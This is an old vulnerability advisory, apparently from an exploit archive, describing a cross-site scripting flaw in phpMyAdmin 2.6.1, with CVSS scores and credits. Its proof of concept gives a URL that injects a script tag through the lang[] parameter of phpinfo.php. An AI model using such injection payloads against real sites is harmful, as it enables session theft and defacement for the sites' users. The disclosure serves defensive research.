phpMyAdmin 2.6.1 Local Cross Site Scripting

2007.04.13
Credit: the_3dit0r
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

""""""""""""""""""""""""""""""""""""""""""""""" """ :: :: ::::: :::: """ """ :: :: :: : :: """ """ :::: :: :: ::::: ::::: :::: """ """ :: :: ::: ::: :: :: :: :: :: """ """ :: :: :: : : ::::: :: :: :::: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""" Xmor$ Security Vulnerability Research TM # Tilte: phpMyAdmin 2.6.1 Local Cross Site Scripting # Author..................: [the_Edit0r] # HomePage................: [Www.XmorS-SEurity.coM] # Location ...............: [Iran] # Software ...............: [phpMyAdmin ] # Impact..................: [ Remote ] # Site Script ............: [http://sourceforge.net/projects/phpmyadmin/] # We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ] ------------------------------- proof Of Concept --------------------------- Link : http://localhost/mysql/phpinfo.php?lang=fa-utf-8&server=1&collation_conn ection=utf8_general_ci http://localhost/mysql/phpinfo.php?lang[]=<script>alert(/the_Edit0r/);</ script>&server=1&collation_connection=utf8_general_ci ------------------------------------------------------------------------ --- # Contact me : the_3dit0r[at]Yahoo[dot]coM # [XmorS-SEcurity.coM]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top